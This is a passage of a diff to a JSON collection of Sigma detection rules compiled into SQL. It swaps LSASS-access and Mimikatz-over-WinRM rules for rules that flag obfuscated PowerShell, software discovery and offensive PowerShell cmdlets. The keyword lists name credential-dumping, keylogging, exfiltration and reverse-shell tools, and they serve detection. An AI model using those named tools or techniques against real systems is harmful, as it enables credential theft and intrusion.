'%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess 
LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' 
ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "status": "experimental", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + 
"attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE 
'%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' 
ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", - "author": "frack113", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", 
+ "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 
'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText 